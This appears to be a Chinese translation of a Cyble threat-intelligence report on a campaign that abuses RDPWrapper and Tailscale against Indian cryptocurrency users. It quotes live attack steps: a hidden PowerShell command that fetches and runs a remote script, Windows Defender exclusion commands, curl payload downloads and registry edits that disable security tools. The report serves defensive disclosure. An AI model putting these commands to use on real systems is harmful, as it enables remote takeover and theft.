新的恶意软件活动滥用 RDPWrapper 和 Tailscale 来攻击加密货币用户

关键要点 

• Cyble 研究与情报实验室 (CRIL) 发现了一个多阶段网络攻击活动，其中的 Zip 文件包含恶意快捷方式 (.lnk) 文件。  

• 当执行快捷方式时，它会下载一个 PowerShell 脚本，启动一系列事件，最终允许威胁行为者 (TA) 获得受害者系统的远程桌面协议 (RDP) 访问权限。 

• 感染涉及各种组件，包括 PowerShell 脚本、批处理文件、基于 Go 的二进制文件和易受攻击的驱动程序。  

• 值得注意的是，TA 似乎正在计划发起 Windows BYOVD（自带易受攻击的驱动程序）攻击，使用名为 Terminator（Spyboy）的驱动程序。  

• 此次活动的一个关键方面是使用 RDPWrapper 促进 RDP 连接并使用 Tailscale 连接到 TA 的私有网络，这是一种相对较新的技术。   

• 此次攻击活动似乎针对的是与加密货币行业相关的个人。它使用与印度流行的加密货币交易所 CoinDCX 上的加密货币期货交易相关的诱饵 PDF。这种诱饵选择表明威胁行为者 (TA) 可能专门针对印度用户，这表明攻击的地理重点。 

• 我们在调查过程中发现，此次活动中使用的诱饵 PDF 也用于 StealC 感染链，这表明此次攻击背后可能是同一个 TA。  

概括 

CRIL 发现了一个多阶段的网络攻击活动，该活动以包含恶意快捷方式文件 (.lnk) 的 Zip 文件开始。截至目前，此 Zip 文件的来源尚不清楚，但我们怀疑它是通过网络钓鱼电子邮件传播的。.lnk 文件在执行时会下载一个 PowerShell 脚本，最终允许威胁行为者 (TA) 获得对受害者系统的 RDP 访问权限。为了误导受害者，受害者的屏幕上会显示一个与 CoinDCX 上的加密货币交易相关的诱饵 PDF，表明可能关注印度用户。  

攻击涉及各种组件，包括 PowerShell 脚本、批处理文件、基于 Go 的二进制文件和易受攻击的驱动程序。TA 似乎正在计划使用 Terminator (Spyboy) 驱动程序进行 Windows BYOVD 攻击，该驱动程序在初始感染期间未执行，但可能在获得远程连接后执行。 

TA 利用了合法应用程序，包括用于远程访问的 RDPWrapper 和用于连接到 TA 专用网络的 Tailscale。Tailscale 是一个虚拟专用网络 (VPN)，允许用户创建专用网络，设备可以使用加密连接直接相互连接。它包括一项基于 Web 的管理服务，可轻松进行管理和配置。 

威胁行为者 (TA) 试图在这次攻击中建立反向连接。他们使用 Tailscale 身份验证将受害者的机器添加为其私有网络上的节点。在这种情况下，TA 不会直接连接到受害者的系统；相反，受害者的系统会启动反向连接。TA 利用 RDPWrapper 作为 RDP 客户端。通常，Windows 只允许每台 PC 进行一个 RDP 会话，但 RDPWrapper 允许每个用户进行多个会话。 

图1 – 感染链 

技术分析 

初始感染从包含快捷方式 (.lnk) 文件的 Zip 存档开始。执行时，此快捷方式文件会下载并运行混淆的 PowerShell 脚本。.lnk 文件执行以下命令： 

C:Windowssystem32cmd.exe /C pOwErShELL -w H $ThKEdEe = 'aiVmHYsJXPJviCKnBWtcRvqqxjcMZEfqqesAlsXPWDuJo'; iEx(irm hxxps://cloudflareupdate[.]co/XmSI.txt )

上述命令从 hxxps://cloudflareupdate[.]co/XmSI.txt 下载 PowerShell 脚本并执行它。  

下图显示了XBIb.txt。 

图2 – XBIb.txt 

互斥锁创建 

该PowerShell脚本包含一个base64编码的内容，可充当dropper。它执行以下操作： 

使用 System.Threading.Mutex() 函数创建两个互斥锁，名称分别为“RUNNING”和“STARTUAC”。这可确保只有一个脚本实例正在运行。  

下图显示了创建Mutex的脚本。 

图3 – 创建互斥锁 

UAC 验证 

然后，脚本通过查询注册表项“HKLM:SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem.EnableLUA”检查系统上是否启用了用户帐户控制 (UAC)。如果此值设置为 1，则表示启用了 UAC。它还会检索“HKLM:SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem.ConsentPromptBehaviorAdmin”的值并将其存储在变量 isUACOpen 中。此值决定了管理员同意提示的行为。  

下图说明了用于 UAC 检查的代码。  

图4 – 检查 UAC 的状态 

假设UAC被禁用，或者isUACOpen的值设置为0，表示管理员可以在没有同意或凭据的情况下执行需要提升权限的操作。在这种情况下，脚本将执行下图中提到的命令。 

图5 – 检查 UAC 是否已启用 

添加排除项 

此命令以提升的（管理员）权限启动命令提示符。在提升的命令提示符中，powershell.exe 使用特定参数运行，以隐藏其窗口并绕过执行策略。 

PowerShell 命令： 

• 添加-MpPreference -ExclusionPath $env:APPDATA; 添加-MpPreference -ExclusionPath $env:TEMP  

将 %temp% 和“%APPDATA%Roaming”目录添加到 Windows Defender 的排除列表中，阻止其扫描这些目录。 

然后，它解密嵌入的二进制文件，将其作为“cvnPCrQdkzwdMrWimioArHeGeMPPl.exe”放在“％AppData％Roaming”目录中并执行它。  

下图显示了删除二进制文件的脚本。  

图6 – 删除二进制文件 

如果启用了 UAC，且在没有同意或凭据的情况下无法执行操作，则此脚本将运行无限循环以执行上述相同的 PowerShell 命令。它使用异常处理来确保脚本即使初始失败也能成功运行，并在遇到异常后每 2 秒重试一次。  

图7 – 运行无限循环 

基于 Go 的 Loader 

上面释放的二进制文件是一个基于 64 位 Go 的加载程序。执行时，它会检查是否以管理员权限运行。如果不是，它会使用“runAs”命令以提升的权限生成自身，如下图所示。  

图8 – 使用提升的权限自行运行 

现在，它会从资源中加载一个名为“DCXFutures.pdf”的诱饵 PDF。它会将这个干净的 PDF 放在 %temp% 目录中，并使用十位数字的字符串为其分配一个随机名称。然后向受害者显示该 PDF，如下图所示。  

图9 – 投放诱饵 PDF 

该 PDF 包含有关未来在 CoinDCX 平台上进行加密货币交易的详细指南。CoinDCX 是一家总部位于印度的加密货币交易平台，因此我们怀疑目标可能来自印度。 

图10 – 诱饵 PDF 

执行完上述操作后，加载器会动态生成一个名为script_<number>.bat的批处理脚本，该脚本会被创建并保存在%temp%目录下，如下图所示。脚本创建完成后，会执行该脚本，执行成功后会删除该脚本，以消除感染痕迹。  

图11 – 删除批处理脚本 

此批处理脚本动态构建用于下载可执行文件的 URL 和文件名。它使用 curl 从以下 URL 下载文件： 

• hxxp[:]//microsoft-windows.cloud/adr.exe，  

• hxxp[:]//microsoft-windows.cloud/Terminator.sys 

• hxxp[:]//microsoft-windows.cloud/main.exe 

它会将 adr.exe 和 main.exe 重命名为随机数字字符串，然后保存并执行它们。此脚本不包含执行 Terminator.sys 文件的代码。下图显示了批处理脚本。 

图12 – 批处理脚本 

GoDefender：Adr.exe

这是来自 GitHub 上名为GoDefender的开源项目的 64 位 GoLang 二进制文件。它提供了强大的功能来检测和防御各种调试工具和虚拟化环境。  

下图显示了二进制文件中嵌入的 GitHub URL。  

图13 – GoDefender 

这个 Go 二进制文件既执行反虚拟化，又执行反调试。它使用命令“taskkill /F /IM”终止与恶意软件分析相关的进程，如下图所示。此外，它还执行命令“wmic diskdrive get model”来识别沙盒环境。 

图14 – 终止进程 

BYOVD（自带易受攻击的驱动程序）：Terminator.sys

这是一个合法的 Windows 驱动程序。由于其对应版本 zam32.sys 和 zam64.sys 存在漏洞，此版本通常与各种绕过或恶意软件有关。据报道， Terminator能够绕过运行 Windows 7 及更高版本的设备上的 24 种不同的防病毒 (AV)、端点检测和响应 (EDR) 和扩展检测和响应 (XDR) 安全解决方案，包括 Windows Defender。Terminator 会释放一个名为 zamguard64.sys 或 zam64.sys 的合法、已签名的 Zemana 反恶意软件内核驱动程序。  

威胁行为者 (TA) 也多次报告了终结者的存在。有一次，BlackCat 勒索软件在其行动中利用了终结者。 

图15. zam64 

RdpWrapper/TailScale：main.exe

main.exe 充当 RDPWrapper 的安装程序并配置 TailScale。执行后，它将运行 PowerShell 脚本，如下图所示。它设置一个 PowerShell 命令以使用 os_exec_Command ()函数执行它。PowerShell 命令以 Base64 编码。 

图16 – 执行 PoweShell 脚本 

该 PowerShell 脚本最初配置系统以方便每个用户进行多个并发远程桌面会话，并放宽使用空白密码的安全策略，如下图所示。  

图17 – 配置 RDP 设置 

此后，它会通过更改以下注册表项来禁用各种通知系统、限制当前用户的某些系统功能并阻止特定服务运行： 

禁用 Toast 通知、气球提示和通知中心。 

• reg 添加“HKCUSoftwarePoliciesMicrosoftWindowsExplorer”/v DisableNotificationCenter /t REG_DWORD /d 1 /f 

抑制来自 Windows Defender 的通知。 

• reg 添加“HKLMSOFTWAREPoliciesMicrosoftWindows DefenderNotifications”/v DisableEnhancedNotifications /t REG_DWORD /d 1 /f 

禁用当前用户对任务管理器和命令提示符的访问。 

• reg 添加“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem”/v DisableTaskMgr /t REG_DWORD /d 1 /f 

• reg 添加“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem”/v DisableCMD /t REG_DWORD /d 1 /f 

从当前用户的“开始”菜单中删除“运行”命令。 

• reg 添加“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer”/v NoRun /t REG_DWORD /d 1 /f 

防止安全健康服务自动启动。 

• reg 删除 “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun” /v SecurityHealth /f 

这些修改可能旨在逃避防御并减少用户中断，从而增强对系统行为的控制。  

图18 – 修改注册表 

之后，它会自动安装和配置 RDPWrapper（远程桌面协议）。该脚本首先执行一个可执行文件（743gnd8.exe – RDP 安装程序文件），该文件由 %temp% 目录中的 main.exe 释放。它使用特定参数（-i -s）在隐藏窗口中进行安装。它从 hxxps://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini 获取 RDPWraper 配置文件。  

下图为RDPWrapper的安装代码。  

图19   – 安装 RDPWraper 

随后，该脚本会创建一个名为“luxGO2GH7fzo9Uo”且具有管理权限的新本地用户帐户，并使用 Chocolatey 安装 Tailscale。Tailscale 是一种用于设置安全专用网络的 VPN 服务。该脚本包含一个硬编码的 Tailscale 身份验证密钥。使用此密钥将受害者的计算机添加到攻击者的专用网络中。  

图20 – 硬编码 Tailscale Auth 密钥 

此后，它会对以下注册表项执行 reg delete 命令，以消除 Tailscale 安装的痕迹。 

• reg 删除 “HKEY_LOCAL_MACHINESOFTWAREClasses*shelltailscale” /f 

• reg 删除“HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionUninstall{c4aca4d4-d6ee-48a2-a4f0-612c3f06aad4} 

然后，它会创建一个启动快捷方式，以便在用户登录时自动运行“adr.exe”。接下来，它会安装 OpenSSH 服务器，启动 SSH 服务，并将其设置为在系统启动时自动运行，如下图所示。  

图21 – 启动 SSH 服务 

一旦攻击者获得远程桌面协议 (RDP) 访问权限，他们就能对连接的设备进行全面控制。他们可以部署恶意软件和勒索软件，导致数据丢失、财务盗窃和服务中断。他们可以窃取敏感信息，包括个人数据、商业机密和知识产权。受感染的系统还可以作为网络内进一步攻击的启动板，使攻击者能够转向其他设备、提升权限或横向移动。此外，攻击者可以在受感染的系统上执行命令，从而可能危害其他系统或进行侦察。 

附加信息 

我们的调查发现，此次活动中使用的诱饵 PDF 也用于 StealC 感染链。有趣的是，传递 StealC 的初始文件（SHA256：  

22370d27ad889faf5cd15bce36f6b6ef8c6a542e1ab97e744a021e75d63762bf）名为“加密货币交易专家工作机会.exe”。有可能是同一个 TA 策划了两次针对加密货币用户的攻击。  

结论 

此次攻击活动可能涉及计划使用 Terminator (Spyboy) 驱动程序执行 Windows BYOVD（自带易受攻击驱动程序）攻击。虽然此驱动程序在初始感染期间未激活，但 TA 很可能打算在建立远程连接后利用它。此外，该攻击活动使用 RDPWrapper 等合法应用程序进行 RDP 访问，并使用 Tailscale 连接到 TA 的专用网络。虽然Kimusky 等 APT 组织在攻击中利用了 RDPWrapper，但关于同时使用 Tailscale 和 RDPWrapper 进行攻击的报告并不多。 

https://cyble.com/blog/new-malware-campaign-abusing-rdpwrapper-and-tailscale-to-target-cryptocurrency-users/